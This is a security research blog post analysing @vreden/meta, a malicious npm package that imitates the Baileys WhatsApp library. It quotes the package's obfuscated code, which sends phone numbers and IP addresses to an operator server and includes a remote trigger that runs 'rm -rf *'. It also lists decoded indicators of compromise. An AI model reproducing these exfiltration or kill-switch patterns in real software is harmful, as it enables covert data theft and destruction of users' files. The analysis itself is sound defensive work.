Security News
Research
Data Theft Repackaged: A Case Study in Malicious Wrapper Packages on npm
The Socket Research Team breaks down a malicious wrapper package that uses obfuscation to harvest credentials and exfiltrate sensitive data.
Kush Pandya
November 15, 2024
"The authentication was successful. Your files are gone."
This isn't a ransomware message - it's the silent outcome of a newly discovered malware masquerading as a WhatsApp Web client implementation. What makes this threat particularly concerning isn't just its ability to delete your files, but the way it hides in plain sight within standard authentication flows that developers trust every day.
Our security team has uncovered a multi-stage attack where every successful connection to WhatsApp's servers could trigger a ticking time bomb. The malware authors didn't just build a data stealer - they created a destructive payload that waits for the perfect moment to strike, all while masquerading as legitimate code that many developers wouldn't think twice about using.
With messaging platforms becoming central to modern applications and over 500 messaging-related malware incidents reported in 2024 alone, this implementation stands out for its particularly devious approach, because it uses WhatsApp's own authentication process as a weapon.
The malicious package @vreden/meta (https://socket.dev/npm/package/@vreden/meta) was discovered during a routine scan of npm packages related to WhatsApp API implementations. What caught our attention was a suspicious modification of the authentication flow in the main file. Further investigation showed that the package also copies the README of Baileys (https://socket.dev/npm/package/baileys), the legitimate WhatsApp Web library it imitates, to appear trustworthy while hiding destructive capabilities in its code.
```javascript
// Trojaned pairing-code function as quoted from @vreden/meta (transpiled TypeScript)
const requestPairingCode = async (phoneNumber) => {
    // Base64-encoded URLs, with variable names chosen to look like unrelated Node/stream internals
    const defaultMaxListenersBuffer = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9";
    const streamListerBuffer = "aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA==";
    // Legitimate authentication mixed with data collection
    authState.creds.pairingCode = (0, Utils_1.bytesToCrockford)((0, crypto_1.randomBytes)(5));
    authState.creds.me = {
        id: (0, WABinary_1.jidEncode)(phoneNumber, 's.whatsapp.net'),
        name: '~'
    };
    ev.emit('creds.update', authState.creds);
    // Hidden data exfiltration: look up the host's public IP, then send phone number and IP to the operator
    const response = await axios_1.default.get(`${atob(streamListerBuffer)}`);
    await axios_1.default.get(`${atob(defaultMaxListenersBuffer)}${phoneNumber}&s=${response.data.ip}`);
    // (the quoted snippet ends here; the function's return value is not shown)
};
```
Three things stand out in this function:

- streamListerBuffer decodes to hxxps://ipwho[.]is/?lang=id-ID, a public IP information service used to learn the host's public IP address (and whatever location data the service returns).
- defaultMaxListenersBuffer decodes to hxxps://rest-api[.]vreden[.]my[.]id/leads?id=, the data collection endpoint; the phone number is sent in the id parameter and the IP address in s.
- The bytesToCrockford call is genuine pairing-code generation and serves as camouflage: a reviewer skimming the function sees the Baileys logic they expect around the two extra requests, while the exfiltration occurs.

A second function carries the destructive payload:

```javascript
// Remote kill switch as quoted from @vreden/meta: ask the operator's server whether to fire
const interaktiveMeta = async (phoneNumber) => {
    // Decodes to hxxps://rest-api[.]vreden[.]my[.]id/cek?id=
    const metaBufferKey = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ==";
    const response = await axios_1.default.get(`${atob(metaBufferKey)}${phoneNumber}`);
    // Any truthy "message" in the reply wipes the contents of the process's working directory
    if (response.data.message) {
        (0, child_process_1.exec)("rm -rf *");
    }
    return "the interaktiveMessage is available";
};
```
rm -rf * is a destructive Unix/Linux command: rm removes files, -r recurses into directories so entire trees are removed, and -f forces deletion without prompting and ignores missing files. The * glob expands to every non-hidden entry in the working directory of the Node process that loaded the package, which is typically the project root (or, in a container, whatever the image's working directory is). Two details matter when assessing impact: the shell glob does not match dotfiles, so entries such as .env or .git survive, and the command only works where exec() reaches a POSIX shell; on Windows exec() runs through cmd.exe, where rm is not a command.

The malware's primary system-level threat is this unrestricted file-system access through exec. Most critically, it can run rm -rf *, which wipes the directory tree under the working directory without warning or any recovery option. Because the trigger is a remote check rather than a fixed condition, the operator decides when, and for which phone numbers, the wipe happens. Combined with the phone-number and IP collection in the pairing flow, this creates a severe risk to system integrity and data availability.
The data security implications are extensive. At its core, the malware harvests the phone number supplied to the authentication flow and, via ipwho.is, the host's public IP address and whatever location data that service returns, and sends both to the operator's server. Because the code runs inside the process that holds authState.creds, it also has access to the WhatsApp session credentials it is supposed to manage; the snippets above do not show those being sent, but nothing prevents a later version from doing so. Even the data that is sent ties a phone number to a host and location, which is enough to target the user or the system for further attacks.

From a network perspective, the package makes unsolicited outbound HTTPS requests to the operator's infrastructure on every pairing attempt and on every call to interaktiveMeta. The base64 encoding hides the endpoints from a casual read of the source, not from the network: the requests themselves are ordinary HTTPS GETs, so they are visible to egress logging and proxy controls. The cek endpoint is a remote trigger: the server's reply decides whether the wipe runs, which gives the operator control over infected hosts and a natural place to add further instructions in a future version.
Indicators of compromise, decoded from the base64 literals in the code above:

aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9 -> hxxps://rest-api[.]vreden[.]my[.]id/leads?id=
aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA== -> hxxps://ipwho[.]is/?lang=id-ID
aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ== -> hxxps://rest-api[.]vreden[.]my[.]id/cek?id=

ipwho[.]is is a legitimate public lookup service; a request to it from a WhatsApp library is suspicious context, not a C2 host to block on its own. The vreden[.]my[.]id endpoints are the operator's infrastructure.

Malicious functions to search for in the package source:

interaktiveMeta
getPairingCode (the pairing-code function appears as requestPairingCode in the snippet above)
This package shows how little obfuscation is needed when malicious code sits inside a flow developers expect to see: two base64 literals, one extra HTTP request and one exec call, placed in the middle of otherwise ordinary pairing-code logic. The combination of data exfiltration and a remotely triggered destructive payload poses a significant risk to system integrity and data security.

To protect against such threats, implement Socket's security scanning tools for automated detection of suspicious code patterns and potentially malicious dependencies.

Threat actors exploit human error and trust by mimicking and typosquatting trusted authors and packages to get malicious code into applications. It is crucial to verify package and author names carefully, review third-party code, and use security tools to detect potentially malicious packages.
Socket's free GitHub app detects malicious packages and serves as your first line of defense against known malware and other supply chain risks like install scripts, telemetry, and typo-squatting. It scans incoming dependencies in real-time with every pull request, instantly alerting developers via a GitHub comment if a potential typo-squatted package is detected.
Enhance your security further with the Socket CLI tool, which alerts you to packages that may contain malware and to other security issues. Its "safe npm" feature proactively shields your machine from bad packages during npm install. Socket wraps npm commands, running the real npm install process while analyzing results in the background, even for deeply nested dependencies. Before writing anything to disk, it alerts you to risky packages, giving you the choice to stop the install or proceed.
Install the Socket CLI:

```
npm install -g socket
```

Then prefix npm installs with socket to analyze them before installation:

```
socket npm install react
```
Socket for GitHub and Socket CLI integrate seamlessly into your workflow, are free to use, and can save your app or organization from the disastrous consequences of supply chain attacks using typosquatting. Install them today to prevent risky dependencies from landing in your applications.